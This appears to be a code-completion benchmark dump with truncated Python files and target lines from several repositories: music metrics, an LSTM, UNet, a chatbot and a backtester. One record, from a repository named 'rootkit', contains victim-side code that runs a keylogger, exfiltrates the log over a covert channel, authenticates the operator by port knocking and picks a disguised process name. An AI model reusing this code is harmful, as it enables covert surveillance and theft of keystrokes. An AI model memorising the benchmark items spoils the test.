if self.embed.author.url != self.check_against \
else self.author
| author_icon = await fill_out(self.guild, embed_author_icon, [
| 1 | 2023-12-18 14:17:31+00:00 | 2k |
mariaalfaroc/a2s-transformer | my_utils/metrics.py | [
{
"identifier": "VOICE_CHANGE_TOKEN",
"path": "my_utils/encoding_convertions.py",
"snippet": "VOICE_CHANGE_TOKEN = \"<COC>\""
},
{
"identifier": "STEP_CHANGE_TOKEN",
"path": "my_utils/encoding_convertions.py",
"snippet": "STEP_CHANGE_TOKEN = \"<COR>\""
}
] | import os
import shutil
from music21 import converter as converterm21
from pyMV2H.utils.mv2h import MV2H
from pyMV2H.metrics.mv2h import mv2h
from pyMV2H.utils.music import Music
from pyMV2H.converter.midi_converter import MidiConverter as Converter
from .encoding_convertions import VOICE_CHANGE_TOKEN, STEP_CHANGE_TOKEN | 927 |
def compute_metrics(y_true, y_pred):
################################# Sym-ER and Seq-ER:
metrics = compute_ed_metrics(y_true=y_true, y_pred=y_pred)
################################# MV2H:
mv2h_dict = compute_mv2h_metrics(y_true=y_true, y_pred=y_pred)
metrics.update(mv2h_dict)
return metrics
#################################################################### SYM-ER AND SEQ-ER:
def compute_ed_metrics(y_true, y_pred):
def levenshtein(a, b):
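        # Two-row dynamic-programming Levenshtein (edit) distance between sequences a and b.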
n, m = len(a), len(b)
if n > m:
a, b = b, a
n, m = m, n
current = range(n + 1)
for i in range(1, m + 1):
previous, current = current, [i] + [0] * n
for j in range(1, n + 1):
add, delete = previous[j] + 1, current[j - 1] + 1
change = previous[j - 1]
if a[j - 1] != b[i - 1]:
change = change + 1
current[j] = min(add, delete, change)
return current[n]
ed_acc = 0
length_acc = 0
label_acc = 0
for t, h in zip(y_true, y_pred):
ed = levenshtein(t, h)
ed_acc += ed
length_acc += len(t)
if ed > 0:
label_acc += 1
return {
"sym-er": 100.0 * ed_acc / length_acc,
"seq-er": 100.0 * label_acc / len(y_pred),
}
#################################################################### MV2H:
def compute_mv2h_metrics(y_true, y_pred):
def krn2midi(in_file):
a = converterm21.parse(in_file).write("midi")
midi_file = a.name
shutil.copyfile(a, midi_file)
os.remove(in_file)
return midi_file
def midi2txt(midi_file):
txt_file = midi_file.replace("mid", "txt")
converter = Converter(file=midi_file, output=txt_file)
converter.convert_file()
with open(txt_file, "r") as fin:
f = [u.replace(".0", "") for u in fin.readlines()]
with open(txt_file, "w") as fout:
for u in f:
fout.write(u)
os.remove(midi_file)
return txt_file
########################################### Polyphonic evaluation:
def eval_as_polyphonic():
# Convert to MIDI
reference_midi_file = krn2midi("true.krn")
predicted_midi_file = krn2midi("pred.krn")
# Convert to TXT
reference_txt_file = midi2txt(reference_midi_file)
predicted_txt_file = midi2txt(predicted_midi_file)
# Compute MV2H
reference_file = Music.from_file(reference_txt_file)
transcription_file = Music.from_file(predicted_txt_file)
res_dict = MV2H(multi_pitch=0, voice=0, meter=0, harmony=0, note_value=0)
try:
res_dict = mv2h(reference_file, transcription_file)
except:
pass
# Remove auxiliar files
os.remove(reference_txt_file)
os.remove(predicted_txt_file)
return res_dict
########################################### Monophonic evaluation:
def get_number_of_voices(kern):
num_voices = 0
for token in kern:
if token == VOICE_CHANGE_TOKEN:
continue
|
def compute_metrics(y_true, y_pred):
################################# Sym-ER and Seq-ER:
metrics = compute_ed_metrics(y_true=y_true, y_pred=y_pred)
################################# MV2H:
mv2h_dict = compute_mv2h_metrics(y_true=y_true, y_pred=y_pred)
metrics.update(mv2h_dict)
return metrics
#################################################################### SYM-ER AND SEQ-ER:
def compute_ed_metrics(y_true, y_pred):
def levenshtein(a, b):
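        # Two-row dynamic-programming Levenshtein (edit) distance between sequences a and b.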
n, m = len(a), len(b)
if n > m:
a, b = b, a
n, m = m, n
current = range(n + 1)
for i in range(1, m + 1):
previous, current = current, [i] + [0] * n
for j in range(1, n + 1):
add, delete = previous[j] + 1, current[j - 1] + 1
change = previous[j - 1]
if a[j - 1] != b[i - 1]:
change = change + 1
current[j] = min(add, delete, change)
return current[n]
ed_acc = 0
length_acc = 0
label_acc = 0
for t, h in zip(y_true, y_pred):
ed = levenshtein(t, h)
ed_acc += ed
length_acc += len(t)
if ed > 0:
label_acc += 1
return {
"sym-er": 100.0 * ed_acc / length_acc,
"seq-er": 100.0 * label_acc / len(y_pred),
}
#################################################################### MV2H:
def compute_mv2h_metrics(y_true, y_pred):
def krn2midi(in_file):
a = converterm21.parse(in_file).write("midi")
midi_file = a.name
shutil.copyfile(a, midi_file)
os.remove(in_file)
return midi_file
def midi2txt(midi_file):
txt_file = midi_file.replace("mid", "txt")
converter = Converter(file=midi_file, output=txt_file)
converter.convert_file()
with open(txt_file, "r") as fin:
f = [u.replace(".0", "") for u in fin.readlines()]
with open(txt_file, "w") as fout:
for u in f:
fout.write(u)
os.remove(midi_file)
return txt_file
########################################### Polyphonic evaluation:
def eval_as_polyphonic():
# Convert to MIDI
reference_midi_file = krn2midi("true.krn")
predicted_midi_file = krn2midi("pred.krn")
# Convert to TXT
reference_txt_file = midi2txt(reference_midi_file)
predicted_txt_file = midi2txt(predicted_midi_file)
# Compute MV2H
reference_file = Music.from_file(reference_txt_file)
transcription_file = Music.from_file(predicted_txt_file)
res_dict = MV2H(multi_pitch=0, voice=0, meter=0, harmony=0, note_value=0)
try:
res_dict = mv2h(reference_file, transcription_file)
except:
pass
# Remove auxiliar files
os.remove(reference_txt_file)
os.remove(predicted_txt_file)
return res_dict
########################################### Monophonic evaluation:
def get_number_of_voices(kern):
num_voices = 0
for token in kern:
if token == VOICE_CHANGE_TOKEN:
continue | if token == STEP_CHANGE_TOKEN: | 1 | 2023-12-18 20:01:00+00:00 | 2k |
YashsviG/rootkit | victim.py | [
{
"identifier": "port_knocking",
"path": "portknocker.py",
"snippet": "def port_knocking(victim_ip):\n \"\"\"\n Perform port knocking on the victim side to authenticate the commander.\n\n Args:\n victim_ip (str): IP address of the victim.\n\n Returns:\n tuple: IP address and port number if successful, None otherwise.\n \"\"\"\n potential_commanders = {}\n while True:\n packet = sniff(filter=f\"tcp and dst {victim_ip}\", count=1)[0]\n\n if TCP in packet and IP in packet:\n src_ip = packet[IP].src\n src_port = packet[TCP].dport\n\n if src_port in knock_ports:\n current_time = time.time()\n\n if src_ip not in potential_commanders:\n potential_commanders[src_ip] = []\n\n potential_commanders[src_ip].append((src_port, current_time))\n\n # Check if all knock ports have been hit within the timeout period\n print(potential_commanders)\n if len(potential_commanders[src_ip]) >= len(knock_ports):\n # Check for valid timestamps\n valid_timestamps = True\n for i, (port, timestamp) in enumerate(potential_commanders[src_ip]):\n if i == 0:\n continue\n\n previous_timestamp = potential_commanders[src_ip][i - 1][1]\n if abs(timestamp - previous_timestamp) > timeout:\n valid_timestamps = False\n potential_commanders.pop(src_ip)\n\n if valid_timestamps:\n # Successful port knocking sequence\n return src_ip, 7000\n\n # Wait for the next packet\n time.sleep(0.1)"
},
{
"identifier": "choose_process_name",
"path": "processname.py",
"snippet": "def choose_process_name():\n \"\"\"\n Choose a process name based on existing process names.\n\n Returns:\n str: Chosen process name.\n \"\"\"\n # Get a list of all existing process names\n existing_process_names = [p.name() for p in psutil.process_iter()]\n\n if existing_process_names:\n chosen_name = analyze_existing_process_names()\n else:\n chosen_name = \"nvme-update-wq\"\n\n print(f\"Process name chosen {chosen_name}\")\n return chosen_name"
},
{
"identifier": "get_ip_address",
"path": "utils.py",
"snippet": "def get_ip_address():\n \"\"\"\n Get the local IP address of the machine.\n\n Returns:\n str: Local IP address.\n \"\"\"\n with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:\n s.connect((\"8.8.8.8\", 80))\n name = s.getsockname()[0]\n return name"
},
{
"identifier": "transfer_keylog_file",
"path": "utils.py",
"snippet": "def transfer_keylog_file(keylogger, covert, file_path):\n \"\"\"\n Transfer the keylog file.\n\n Args:\n keylogger (Keylogger): Keylogger instance.\n covert (CovertChannel): Covert channel instance.\n file_path (str): Path of the keylog file.\n\n Returns:\n int: Status code (3 if unsuccessful).\n \"\"\"\n if keylogger.get_status():\n print(\"VICTIM:: Cannot transfer, Keylogger running\")\n return 3\n \n if not os.path.exists(file_path):\n print(\"VICTIM:: keylog.txt does not exist\")\n return 3\n \n covert.cmd = 0\n covert.send_data(for_victim=False)\n covert.cmd = None\n covert.file_name = file_path\n covert.send_data(for_victim=False, event=\"IN_CREATE\")\n covert.file_name = None\n os.remove(file_path)"
},
{
"identifier": "check_exists",
"path": "utils.py",
"snippet": "def check_exists(path):\n \"\"\"\n Check if a file or directory exists.\n\n Args:\n path (str): Path to check.\n\n Returns:\n bool: True if exists, False otherwise.\n \"\"\"\n if os.path.exists(path):\n return True\n return False"
}
] | import argparse
import setproctitle
import shutil
from keylogger import *
from watcher import *
from portknocker import port_knocking
from processname import choose_process_name
from utils import get_ip_address, transfer_keylog_file, check_exists
| 1,279 |
def handle_command(command: int, keylogger, watcher, covert):
"""
Handle the received command.
Args:
command (int): Received command.
keylogger (Keylogger): Keylogger instance.
watcher (Watcher): Watcher instance.
covert (CovertChannel): Covert channel instance.
Returns:
int: Result code.
"""
if command == 0:
return 0
print(f"VICTIM:: Command Received", end=" ")
if command == 1:
print("VICTIM:: Received command to start the keylog program...")
keylogger.start_keylogger()
return 1
elif command == 2:
print("VICTIM:: Received command to stop the keylog program...")
if not keylogger.get_status():
print("VICTIM:: Keylogger is not running.")
return 2
val = keylogger.stop_keylogger()
if val == 0:
print("VICTIM:: Keylogger has been stopped.")
return 2
elif command == 3:
print("VICTIM:: Received command to transfer the keylog file...")
return transfer_keylog_file(keylogger, covert, "keylog.txt")
elif command == 4:
print(f"VICTIM:: Received command to watch file...")
file = covert.receive_data(for_victim=True)
|
def handle_command(command: int, keylogger, watcher, covert):
"""
Handle the received command.
Args:
command (int): Received command.
keylogger (Keylogger): Keylogger instance.
watcher (Watcher): Watcher instance.
covert (CovertChannel): Covert channel instance.
Returns:
int: Result code.
"""
if command == 0:
return 0
print(f"VICTIM:: Command Received", end=" ")
if command == 1:
print("VICTIM:: Received command to start the keylog program...")
keylogger.start_keylogger()
return 1
elif command == 2:
print("VICTIM:: Received command to stop the keylog program...")
if not keylogger.get_status():
print("VICTIM:: Keylogger is not running.")
return 2
val = keylogger.stop_keylogger()
if val == 0:
print("VICTIM:: Keylogger has been stopped.")
return 2
elif command == 3:
print("VICTIM:: Received command to transfer the keylog file...")
return transfer_keylog_file(keylogger, covert, "keylog.txt")
elif command == 4:
print(f"VICTIM:: Received command to watch file...")
file = covert.receive_data(for_victim=True)
| i = check_exists(file)
| 4 | 2023-12-19 18:54:22+00:00 | 2k |
yacinxx/dnakey | enginev2.py | [
{
"identifier": "ConfigManager",
"path": "profile_config/config_manager.py",
"snippet": "class ConfigManager:\r\n def __init__(self, prime_key:str) -> None:\r\n with open(\"profile_config/profile_config.json\", \"r\") as f: \r\n self.profile_data = __import__(\"json\").loads(f.read())\r\n self.profile_config = self.profile_data[\"profiles_config\"]\r\n self.prime_key = prime_key\r\n self.create_date = datetime.datetime.now()\r\n self.formatted_datetime = self.create_date.isoformat()\r\n\r\n def configuration(self):\r\n return self.profile_config\r\n \r\n def update_created_profiles(self):\r\n self.profile_config[self.prime_key][\"created_profiles\"] +=1\r\n toast(\":orange[**1 Profile has been added to your prime key**]\", icon=\"🍨\")\r\n return self.profile_config[self.prime_key][\"created_profiles\"]\r\n\r\n def get_date_time(self):\r\n return self.profile_config[self.prime_key][\"date_time\"]\r\n\r\n def update_date_time(self):\r\n if self.profile_config[self.prime_key][\"date_time\"] is None:\r\n self.profile_config[self.prime_key].update({\"date_time\": self.formatted_datetime})\r\n success(\"**You 'Prime Key' has been activated successfully!**\", icon=\"🍧\")\r\n snow()\r\n \r\n def update_profile_activity(self, id_profile:int, activate_merge:bool, save_cookies:bool, formatted_datetime:str) -> None:\r\n self.action = self.profile_config[self.prime_key][\"profile_activity\"][\"action\"]\r\n if id_profile not in self.action:\r\n self.action.update({id_profile:{\r\n \"active_usage\": 0,\r\n \"active_merge\": activate_merge,\r\n \"date_time\": formatted_datetime,\r\n \"request_status\": \"online\",\r\n \"save_cookies\": save_cookies,\r\n \"version\": VERSION}\r\n })\r\n\r\n def get_created_profiles(self):\r\n return self.profile_config[self.prime_key][\"created_profiles\"]\r\n\r\n def get_active_profiles(self):\r\n active_profiles_ids = []\r\n active_profiles = 0\r\n active_profiles_list = list(self.profile_config[self.prime_key][\"profile_activity\"][\"action\"])\r\n for i in active_profiles_list:\r\n if self.profile_config[self.prime_key][\"profile_activity\"][\"action\"][i][\"active_usage\"] != 0:\r\n active_profiles+=1\r\n active_profiles_ids.append(f\"id:{i}\")\r\n return active_profiles, active_profiles_ids if len(active_profiles_ids) != 0 else \"\" \r\n\r\n def get_online_profiles(self):\r\n all_profiles_online = [] \r\n active_profiles_list = list(self.profile_config[self.prime_key][\"profile_activity\"][\"action\"])\r\n for i in active_profiles_list:\r\n if self.profile_config[self.prime_key][\"profile_activity\"][\"action\"][i][\"request_status\"] == \"online\":\r\n all_profiles_online.append(\"online\")\r\n else:\r\n all_profiles_online.append(\"offline\")\r\n if all(profile == \"online\" for profile in all_profiles_online):\r\n return \"Online!\"\r\n else:\r\n return \"Not all profiles are online!\"\r\n\r\n def check_active_usage(self):\r\n all_profiles_active_usage = []\r\n for i in list(self.profile_config[self.prime_key][\"profile_activity\"][\"action\"]):\r\n all_profiles_active_usage.append(self.profile_config[self.prime_key][\"profile_activity\"][\"action\"][i][\"active_usage\"])\r\n if all(profile == 0 for profile in all_profiles_active_usage):\r\n return \"first_time\"\r\n\r\n def get_profile_active_usage(self, id_profile:str) -> int:\r\n return self.profile_config[self.prime_key][\"profile_activity\"][\"action\"][id_profile][\"active_usage\"]\r\n\r\n def update_profile_active_usage(self, id_profile:str) -> None:\r\n self.profile_config[self.prime_key][\"profile_activity\"][\"action\"][id_profile][\"active_usage\"] +=1\r\n\r\n def 
get_merge_active_usage(self):\r\n return len(list(self.profile_config[self.prime_key][\"profile_activity\"][\"action_merge\"]))\r\n\r\n def get_profile_action_merge(self, id_profile:str) -> list[int]:\r\n get_merge = self.profile_config[self.prime_key][\"profile_activity\"][\"action_merge\"][id_profile]\r\n action_merge_len = len(list(get_merge.keys()))\r\n action_merge = sum(list(get_merge.values()))\r\n return action_merge_len, action_merge\r\n\r\n def update_profile_action_merge(self, id_profile:str, merge_with:str) -> None:\r\n action_merge = self.profile_config[self.prime_key][\"profile_activity\"][\"action_merge\"]\r\n if id_profile not in list(action_merge.keys()):\r\n action_merge.update({id_profile:{f\"({id_profile},{merge_with})\": 0}})\r\n if id_profile in list(action_merge.keys()):\r\n if f\"({id_profile},{merge_with})\" in list(action_merge[id_profile].keys()):\r\n action_merge[id_profile][f\"({id_profile},{merge_with})\"] +=1 \r\n else:\r\n action_merge[id_profile].update({f\"({id_profile},{merge_with})\": 0}) \r\n action_merge[id_profile][f\"({id_profile},{merge_with})\"] +=1 \r\n \r\n def update_config(self):\r\n with open(\"profile_config/profile_config.json\", \"w\") as f:\r\n __import__(\"json\").dump(self.profile_data, f, indent=3)\r"
},
{
"identifier": "VERSION",
"path": "license/license_manager.py",
"snippet": "VERSION = license_data[\"version\"]\r"
}
] | from cryptography.fernet import Fernet
from profile_config.config_manager import ConfigManager
from license.license_manager import VERSION
import random, json, string, datetime
| 1,550 |
class DNAEngine():
def __init__(
self,
has_key="test",
profile_name="profile_test",
activate_merge=True,
save_cookies=True,
**advance_settings):
self.has_key = has_key
self.profile_name = profile_name
self.length = advance_settings.get("length", 40)
self.has_lower = advance_settings.get("has_lower", True)
self.has_upper = advance_settings.get("has_upper", True)
self.has_number = advance_settings.get("has_number", True)
self.has_symbol = advance_settings.get("has_symbol", False)
self.has_arabic = advance_settings.get("has_arabic", False)
self.activate_merge = activate_merge
self.save_cookies = save_cookies
# Create a Fernet object with the secret key
secret_key = self.has_key.encode("utf-8")
self.fernet = Fernet(secret_key)
self.create_date = datetime.datetime.now()
# Convert datetime to string
self.formatted_datetime = self.create_date.isoformat()
self.random_func = {
"lower": self.get_random_lower,
"upper": self.get_random_upper,
"number": self.get_random_number,
"symbol": self.get_random_symbol,
"arabic": self.get_random_arabic
}
def create_id_profile(self):
self.config_has_key = f"dnakey${self.has_key[:32:2]}"
|
class DNAEngine():
def __init__(
self,
has_key="test",
profile_name="profile_test",
activate_merge=True,
save_cookies=True,
**advance_settings):
self.has_key = has_key
self.profile_name = profile_name
self.length = advance_settings.get("length", 40)
self.has_lower = advance_settings.get("has_lower", True)
self.has_upper = advance_settings.get("has_upper", True)
self.has_number = advance_settings.get("has_number", True)
self.has_symbol = advance_settings.get("has_symbol", False)
self.has_arabic = advance_settings.get("has_arabic", False)
self.activate_merge = activate_merge
self.save_cookies = save_cookies
# Create a Fernet object with the secret key
secret_key = self.has_key.encode("utf-8")
self.fernet = Fernet(secret_key)
self.create_date = datetime.datetime.now()
# Convert datetime to string
self.formatted_datetime = self.create_date.isoformat()
self.random_func = {
"lower": self.get_random_lower,
"upper": self.get_random_upper,
"number": self.get_random_number,
"symbol": self.get_random_symbol,
"arabic": self.get_random_arabic
}
def create_id_profile(self):
self.config_has_key = f"dnakey${self.has_key[:32:2]}"
| self.config_manager = ConfigManager(self.config_has_key)
| 0 | 2023-12-18 22:04:13+00:00 | 2k |
tamnva/hydroecolstm | examples/example_run.py | [
{
"identifier": "run_train",
"path": "hydroecolstm/model_run.py",
"snippet": "def run_train(config_file):\n \n # Load configuration\n config = read_config(config_file)\n\n # Read and split data\n data = read_train_test_data(config)\n \n # Scale/transformer name for static, dynamic, and target features\n x_scaler_name, y_scaler_name = get_scaler_name(config)\n \n # Scaler/transformer\n x_scaler, y_scaler = Scaler(), Scaler()\n x_scaler.fit(x=data[\"x_train\"], method=x_scaler_name)\n y_scaler.fit(x=data[\"y_train\"], method=y_scaler_name)\n \n # Scale/transform data\n x_train_scale = x_scaler.transform(x=data[\"x_train\"])\n x_test_scale = x_scaler.transform(x=data[\"x_test\"])\n y_train_scale = y_scaler.transform(x=data[\"y_train\"])\n \n # Create the model\n if config[\"model_class\"] == \"LSTM\":\n model = Lstm_Linears(config)\n else:\n model = Ea_Lstm_Linears(config)\n \n # Train with train dataset\n trainer = Train(config, model)\n model, y_train_scale_simulated = trainer(x=x_train_scale, y=y_train_scale)\n \n # Simulated result with test dataset\n y_test_simulated_scale = model(x_test_scale)\n \n # Inverse scale/transform back simulated result to real scale\n data[\"y_train_simulated\"] = y_scaler.inverse(y_train_scale_simulated)\n data[\"y_test_simulated\"] = y_scaler.inverse(y_test_simulated_scale)\n \n return model, x_scaler, y_scaler, data, config"
},
{
"identifier": "plot",
"path": "hydroecolstm/utility/plot.py",
"snippet": "def plot(data: dict, object_id:str,\n train_test_period:str, target_feature:str): \n \n # Get key of observed and simulated target features\n y_observed = \"y_\" + train_test_period\n y_simulated = \"y_\" + train_test_period + \"_simulated\"\n time = \"time_\" + train_test_period\n \n # Get index of the target feature\n index = data[\"y_column_name\"].index(target_feature)\n \n # Extract obeserved and target features from data\n y_observed = data[y_observed][object_id][:, index].detach().numpy()\n y_simulated = data[y_simulated][object_id][:, index].detach().numpy()\n time = data[time][object_id]\n \n # Now plot simulated and observed\n plt.plot(time, y_simulated, color = 'blue', label = \"Simulated\", alpha=0.9, linewidth=0.75)\n plt.plot(time, y_observed, color = 'red', label = \"Observed\", alpha=0.9, linewidth=0.75)\n plt.title(label=f\"Object id = {object_id}, period = {train_test_period}\")\n plt.ylabel(target_feature)\n plt.legend()\n\n return plt"
},
{
"identifier": "show_gui",
"path": "hydroecolstm/interface/main_gui.py",
"snippet": "def show_gui():\n app = MainGUI()\n app.mainloop() "
}
] | from hydroecolstm.model_run import run_train
from hydroecolstm.utility.plot import plot
from hydroecolstm.interface.main_gui import show_gui | 941 |
# Import hydroecolstm function
#-----------------------------------------------------------------------------#
# Run the model #
#-----------------------------------------------------------------------------#
# Configuration file
config_file = "C:/Users/nguyenta/Documents/GitHub/config.yml"
# Train the model => return model, x_scaler, y_scaler, data
model, x_scaler, y_scaler, data, config = run_train(config_file)
# Visualize result: train_test_period = "train" or "test"
for object_id in config["object_id"]:
for target in config["target_features"]:
p = plot(data, object_id=str(object_id), train_test_period="test",
target_feature=target)
p.show()
#-----------------------------------------------------------------------------#
# Work with GUI, use the two lines below to call the GUI #
#-----------------------------------------------------------------------------#
|
# Import hydroecolstm function
#-----------------------------------------------------------------------------#
# Run the model #
#-----------------------------------------------------------------------------#
# Configuration file
config_file = "C:/Users/nguyenta/Documents/GitHub/config.yml"
# Train the model => return model, x_scaler, y_scaler, data
model, x_scaler, y_scaler, data, config = run_train(config_file)
# Visualize result: train_test_period = "train" or "test"
for object_id in config["object_id"]:
for target in config["target_features"]:
p = plot(data, object_id=str(object_id), train_test_period="test",
target_feature=target)
p.show()
#-----------------------------------------------------------------------------#
# Work with GUI, use the two lines below to call the GUI #
#-----------------------------------------------------------------------------# | show_gui() | 2 | 2023-12-20 09:11:36+00:00 | 2k |
LuhhLu/Predictive-Video-Segmentation | unet_train.py | [
{
"identifier": "Load_unet",
"path": "Unet.py",
"snippet": "def Load_unet(path=None):\n if path:\n unet_model = UNet(n_channels=3, n_classes=49)\n unet_model.load_state_dict(torch.load(path))\n else:\n unet_model = UNet(n_channels=3, n_classes=49)\n return unet_model"
},
{
"identifier": "CustomDataset",
"path": "Unet.py",
"snippet": "class CustomDataset(Dataset):\n def __init__(self, image_dir, mask_dir, transform=None):\n self.image_dir = image_dir\n self.mask_dir = mask_dir\n self.transform = transform\n self.images = os.listdir(image_dir)\n\n def __len__(self):\n return len(self.images)\n\n def __getitem__(self, idx):\n img_name = self.images[idx]\n img_path = os.path.join(self.image_dir, img_name)\n\n # Update mask name to match new naming convention and extension\n mask_name = img_name.replace('image', 'mask').replace('.png', '.npy')\n mask_path = os.path.join(self.mask_dir, mask_name)\n\n image = Image.open(img_path).convert(\"RGB\")\n mask = np.load(mask_path) # Load mask as numpy array\n\n if self.transform:\n seed = np.random.randint(2147483647) # Random seed for consistent transformations\n random.seed(seed)\n torch.manual_seed(seed)\n\n # Apply transformations to the image\n image = self.transform(image)\n\n # One-hot encode the transformed mask\n mask = one_hot_encode_mask(mask, 49)\n\n # Convert the mask back to a tensor\n mask = torch.from_numpy(mask)\n\n return image, mask"
},
{
"identifier": "WeightedBCEWithLogitsLoss",
"path": "Unet.py",
"snippet": "class WeightedBCEWithLogitsLoss(nn.Module):\n def __init__(self, weights, reduction='mean'):\n super().__init__()\n self.weights = weights\n self.reduction = reduction\n self.bce_loss = nn.BCEWithLogitsLoss(reduction='none')\n\n def forward(self, inputs, targets):\n bce_loss = self.bce_loss(inputs, targets)\n\n weights_expanded = self.weights.view(1, -1, 1, 1).to(bce_loss.device)\n\n weighted_loss = bce_loss * weights_expanded\n\n if self.reduction == 'mean':\n return weighted_loss.mean()\n elif self.reduction == 'sum':\n return weighted_loss.sum()\n else:\n return weighted_loss"
}
] | from tqdm import tqdm
from torch.utils.data import DataLoader
from torchvision import transforms
from Unet import Load_unet, CustomDataset, WeightedBCEWithLogitsLoss
import torch
import torch.optim as optim
import argparse | 943 |
def main():
# Command-line arguments
parser = argparse.ArgumentParser(description='Train UNet with custom settings')
parser.add_argument('--lr', type=float, default=0.001, help='Learning rate')
parser.add_argument('--batch', type=int, default=64, help='Batch size')
parser.add_argument('--res', type=str, default='full', help='Resolution in the format H,W')
parser.add_argument('--epoch', type=int, default=10, help='number of training epochs')
args = parser.parse_args()
# Process resolution argument
if args.res == 'full':
transform = transforms.Compose([
transforms.ToTensor(),
])
resolution = (160, 240)
else:
try:
res_value = int(args.res)
resolution = (res_value, res_value)
transform = transforms.Compose([
transforms.ToTensor(),
transforms.Resize(resolution, antialias=True),
transforms.Resize((160, 240), antialias=True)
])
except ValueError:
raise ValueError("Invalid resolution value. Please provide 'full' or a single number.")
if args.res == 'full':
print("Training with Resolution: (160, 240)")
filename_suffix = 'full'
else:
res_value = int(args.res)
print(f"Training with Resolution: ({res_value}, {res_value})")
filename_suffix = str(res_value)
|
def main():
# Command-line arguments
parser = argparse.ArgumentParser(description='Train UNet with custom settings')
parser.add_argument('--lr', type=float, default=0.001, help='Learning rate')
parser.add_argument('--batch', type=int, default=64, help='Batch size')
parser.add_argument('--res', type=str, default='full', help='Resolution in the format H,W')
parser.add_argument('--epoch', type=int, default=10, help='number of training epochs')
args = parser.parse_args()
# Process resolution argument
if args.res == 'full':
transform = transforms.Compose([
transforms.ToTensor(),
])
resolution = (160, 240)
else:
try:
res_value = int(args.res)
resolution = (res_value, res_value)
transform = transforms.Compose([
transforms.ToTensor(),
transforms.Resize(resolution, antialias=True),
transforms.Resize((160, 240), antialias=True)
])
except ValueError:
raise ValueError("Invalid resolution value. Please provide 'full' or a single number.")
if args.res == 'full':
print("Training with Resolution: (160, 240)")
filename_suffix = 'full'
else:
res_value = int(args.res)
print(f"Training with Resolution: ({res_value}, {res_value})")
filename_suffix = str(res_value)
| train_dataset = CustomDataset('unet_train/images', 'unet_train/masks', transform) | 1 | 2023-12-17 20:39:14+00:00 | 2k |
garinops/chat-E-AI | embed/clients/itchat/messages/friend.py | [
{
"identifier": "ITCHAT_CALL_CODE_SELF",
"path": "config/settings.py",
"snippet": "ITCHAT_CALL_CODE_SELF = \"AI\""
},
{
"identifier": "ITCHAT_CALL_CODE",
"path": "config/settings.py",
"snippet": "ITCHAT_CALL_CODE = \"AI\""
},
{
"identifier": "ITCHAT_WHITELIST_FRIEND",
"path": "config/settings.py",
"snippet": "ITCHAT_WHITELIST_FRIEND = {}"
},
{
"identifier": "EReplyText",
"path": "embed/reply/text.py",
"snippet": "class EReplyText:\n @staticmethod\n def reply(client, message:MessageCea) -> Send:\n _ceaMsg = message\n _action = _ceaMsg.Action\n _send = Send.model_construct()\n if _action:\n # 记录日志\n client.logger.info(f'Message Signal RX: {_ceaMsg.UserToSession} {UtilsString.log_msg(_ceaMsg.Content)}')\n \"\"\"获取session\"\"\"\n _sess = client.get_session(sess_user_name=_ceaMsg.UserToSession)\n \"\"\"session 消息入列\"\"\"\n _sess.msgQueue.enqueue_user(message_content=_ceaMsg.Content)\n # AI sys messages更新。\n if _sess.ai.msgSysChck:\n if _ceaMsg.Content.startswith(\"###\"):\n _sess.ai.msgSys = _ceaMsg.Content[3:]\n _sess.ai.msgSysChck = False\n else:\n if _ceaMsg.Content.startswith(\"$$$\"):\n _sess.ai.msgSys = OPENAI_SYSTEM_CONTENT\n _sess.ai.msgSysChck = True\n client.logger.info(\"AI System Role:\" + OPENAI_SYSTEM_CONTENT)\n _sess.msgQueue.clear()\n \"\"\"session 消息重新入列\"\"\"\n _sess.msgQueue.enqueue_user(message_content=_ceaMsg.Content)\n elif _ceaMsg.Content.startswith(\"###\"):\n _sess.ai.msgSys = _ceaMsg.Content[3:]\n client.logger.info(\"AI System Role:\" + _sess.ai.msgSys)\n else:\n client.logger.info(\"AI System Role:\" + _sess.ai.msgSys)\n # AI user messages更新。\n _sess.ai.msgUserAssi = _sess.msgQueue.queue\n \"\"\"AI调用\"\"\"\n _sess.ai.response()\n _rspAi = _sess.ai.responseAI\n _rspAns = _rspAi.answer\n \"\"\"messages后置处理\"\"\"\n _sess.msgQueue.enqueue_assistant(message_content=_rspAns)\n \"\"\"assistant messages入列。\"\"\"\n _sess.ai.msgUserAssi = _sess.msgQueue.queue\n \"\"\"会话实例中的OpenAI实例 messages更新。\"\"\"\n # 添加前后缀\n # client.logger.debug({\"MessageCea\":_ceaMsg})\n _contentOutput = f'@{_ceaMsg.NickName}\\n{EUtilsSuffix.add_suffix(_rspAi)}' if _ceaMsg.IsGroup else EUtilsSuffix.add_suffix(_rspAi)\n # 返回\n _send.content = _contentOutput\n _send.user = _ceaMsg.UserToReply\n _send.action = True\n # client.logger.debug(_send)\n # 记录日志\n client.logger.info(f'Message Signal TX: {_ceaMsg.UserToSession} {UtilsString.log_msg(_contentOutput)}')\n else:\n pass\n return _send"
},
{
"identifier": "MessageItchat",
"path": "models/messages.py",
"snippet": "class MessageItchat(BaseModel):\n FromUserName: str\n ToUserName: str\n Type: str\n User: Optional[User]\n Content: Optional[str] = None\n Text: Union[list[str], str, Callable]\n ActualNickName: Optional[str] = None\n IsAt: Optional[bool] = False"
},
{
"identifier": "MessageCea",
"path": "models/messages.py",
"snippet": "class MessageCea(BaseModel):\n UserToReply: Optional[str] = None\n UserToSession: Optional[str] = None\n Content: Optional[str] = None\n Action: Optional[bool] = False\n NickName: Optional[str] = None\n IsGroup: Optional[bool] = False"
},
{
"identifier": "Send",
"path": "models/send.py",
"snippet": "class Send(BaseModel):\n user: Optional[str] = None\n content: Optional[str] = None\n action: Optional[bool] = False"
}
] | from config.settings import ITCHAT_CALL_CODE_SELF, ITCHAT_CALL_CODE, ITCHAT_WHITELIST_FRIEND
from embed.reply.text import EReplyText
from models.messages import MessageItchat, MessageCea
from models.send import Send | 1,025 |
def handle_friend_message(client, message: MessageItchat) -> Send:
_callCodeSelf = ITCHAT_CALL_CODE_SELF
_callCode = ITCHAT_CALL_CODE
|
def handle_friend_message(client, message: MessageItchat) -> Send:
_callCodeSelf = ITCHAT_CALL_CODE_SELF
_callCode = ITCHAT_CALL_CODE | _whiteListFriend = ITCHAT_WHITELIST_FRIEND | 2 | 2023-12-16 17:02:13+00:00 | 2k |
ruudjuffermans/Event-Driven-Backtester | backtester/execution.py | [
{
"identifier": "FillEvent",
"path": "backtester/events.py",
